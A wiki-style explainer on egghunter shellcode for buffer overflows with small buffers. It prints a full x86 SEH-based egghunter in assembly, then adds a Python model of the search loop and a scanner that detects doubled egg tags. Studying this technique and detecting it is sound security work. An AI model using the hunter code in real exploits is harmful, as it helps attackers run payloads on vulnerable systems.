
Second-order-injection attack

From NetSec

Second-order-injection Explained

Second-order injection is typically used when the overflowed buffer is too small to hold a standard shellcode payload. The attacker places the full payload in one input (anywhere it will end up resident in the process's memory) and triggers the actual buffer overflow with a much smaller piece of shellcode whose only job is to locate the real payload in memory and transfer control to it.

The Egghunt

The primary purpose of an egghunt is to cope with an undersized buffer during a buffer overflow attack; it is the search stage of a second-order injection. The larger shellcode is prefixed with a specific "marker" in memory (the egg), and the small hunter code scans memory for that marker and then jumps to the code that follows it. Because the scan walks through memory it has no map of, reading an unmapped page raises an access violation; the hunter below installs its own exception handler so that such faults simply advance the search pointer instead of crashing the process.

<syntaxhighlight lang="asm">
egghunt:
    jmp startup                     ; skip the exception handler

exception_handler:
    mov eax, [esp + 0x0c]           ; get context arg to EH off the stack
    lea ebx, [eax + 0x7c]           ; load effective addr of context plus 0x7c (124) into ebx
                                    ; done to prevent nulls and max_byte_size
    add ebx, 0x3c                   ; complete addr from above (0x7c + 0x3c = 0xb8, the Eip slot of CONTEXT)
    add dword [ebx], 0x07           ; add 7 bytes to eip to skip "egg found" and the jmp to it
                                    ; by skipping, the ptr is incremented and the loop continues
    mov eax, [esp]                  ; grab ret from stack, store in eax
    add esp, 0x14                   ; bypasses a windows stackprotect, does retn 0x10
    push eax                        ; ret addy goes back on the stack
    xor eax, eax                    ; nulled (ExceptionContinueExecution)
    ret

startup:
    mov eax, 0x42904290             ; init eax to the egg to find
    jmp init_exception_handler_skip

init_exception_handler_fwd:
    jmp init_exception_handler      ; obtain absolute addy

init_exception_handler_skip:
    call init_exception_handler_fwd ; call backwards to push the abs. addr of pop ecx onto the stack

init_exception_handler:
    pop ecx                         ; take the abs addr of this line and put it in ecx. SEH abuse anyone?
    sub ecx, 0x25                   ; calc abs addr of the EH by subbing 0x25 (37) from the addr
    push esp                        ; push placeholder to be passed to the SEH
    push ecx                        ; push abs addr of exception_handler
    xor ebx, ebx                    ; nulled
    not ebx                         ; makes it 0xffffffff
    push ebx                        ; indicate no more exception handlers
    xor edi, edi                    ; zero edi, will be offset in fs handler
    mov [fs:edi], esp               ; move the structure for the custom EH into fs:[0], makes custom EH

search_loop_begin_pre:
search_loop_start:
    xor ecx, ecx                    ; ecx will be a counter
    mov cl, 0x2                     ; set stuff to be checked by scasd
    push edi                        ; preserve current ptr to stack
    repe scasd                      ; compare egg to current ptr, make sure egg is found back to back in memory (nopsled!)
    jnz search_loop_failed          ; keep looping if ZF ain't set
    pop edi                         ; restore to orig. value
    jmp edi                         ; jump to our "egg" (our bigger shellcode)

search_loop_failed:
    pop edi                         ; restore to orig. value
    inc edi                         ; inc it to test next ptr
    jmp search_loop_start           ; start over
</syntaxhighlight>
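To make the search loop concrete, here is an added Python model of the hunt above together with a matching detection helper. It is example code written for this page, not code from the NetSec article or from any egghunter project. It assumes the page's egg value 0x42904290, a 4 KiB page size, and a constructed memory image; the fault-skipping behaviour of the SEH handler is modelled by a set of unreadable page indices that the scan steps over. The second function generalises the same check into a scanner a defender can run over captured inputs or memory dumps to flag the doubled tag that marks a staged payload.

```python
import struct
from typing import Iterable, List, Optional, Set

# Egg tag used by the hunter on this page ("mov eax, 0x42904290").
# In memory (little-endian) the dword is the byte sequence 90 42 90 42.
EGG_DWORD = 0x42904290
EGG_BYTES = struct.pack("<I", EGG_DWORD)

PAGE_SIZE = 0x1000  # assumption: 4 KiB pages


def hunt_egg(memory: bytes, egg: bytes = EGG_BYTES,
             unreadable_pages: Optional[Set[int]] = None,
             base: int = 0) -> Optional[int]:
    """Model of the search loop: advance the pointer one byte at a time and at
    each position require the 4-byte egg twice back to back (the 'repe scasd'
    with ecx = 2). Returns the address just past the doubled egg, which is
    where the hunter jumps, or None if no doubled egg exists.

    'unreadable_pages' models pages whose access would fault; the real hunter's
    SEH handler moves EIP past the faulting scasd so the loop continues at the
    next pointer. Here such positions are simply skipped."""
    holes = unreadable_pages or set()
    n = len(egg)
    for off in range(0, len(memory) - 2 * n + 1):
        addr = base + off
        # Both compares touch addr .. addr+7; any byte on a bad page faults.
        if any(((addr + i) // PAGE_SIZE) in holes for i in range(2 * n)):
            continue
        if memory[off:off + n] == egg and memory[off + n:off + 2 * n] == egg:
            return addr + 2 * n
    return None


def find_doubled_tags(data: bytes, tags: Iterable[bytes]) -> List[dict]:
    """Defensive scan: report every offset where a known egg tag appears twice
    in a row. A doubled tag followed by executable-looking bytes is a useful
    signature for a staged (second-order) payload in captured input or a dump."""
    hits = []
    for tag in tags:
        needle = tag * 2
        start = 0
        while True:
            idx = data.find(needle, start)
            if idx < 0:
                break
            hits.append({"offset": idx, "tag": tag.hex(),
                         "payload_offset": idx + len(needle)})
            start = idx + 1
    return hits


# Constructed sample image (not from the page): filler, a lone egg that the
# hunter must ignore, then the doubled egg followed by stand-in payload bytes.
SAMPLE_MEMORY = (
    b"A" * 40
    + EGG_BYTES            # single egg at offset 40: not doubled, skipped
    + b"B" * 20
    + EGG_BYTES * 2        # doubled egg at offset 64
    + b"\xCC" * 16         # stand-in for the staged payload at offset 72
)


def build_image_with_hole() -> bytes:
    """Three constructed pages: empty page 0, then two pages each starting with
    a doubled egg. Marking page 1 unreadable forces the hunter to find the copy
    on page 2, which is what the SEH fix-up achieves on a real system."""
    chunk = EGG_BYTES * 2 + b"\xCC" * 16
    page = chunk + b"\x00" * (PAGE_SIZE - len(chunk))
    return b"\x00" * PAGE_SIZE + page + page


if __name__ == "__main__":
    print("hunter lands at", hunt_egg(SAMPLE_MEMORY))
    print("detector hits:", find_doubled_tags(SAMPLE_MEMORY, [EGG_BYTES]))
    img = build_image_with_hole()
    print("no hole:", hex(hunt_egg(img)), "page 1 unreadable:",
          hex(hunt_egg(img, unreadable_pages={1})))
```

The single egg at offset 40 is deliberately not found: the page's hunter demands the tag twice in a row precisely so that a stray copy of the four bytes elsewhere in memory does not send execution into garbage. The same property makes the doubled tag a low-false-positive signature for detection.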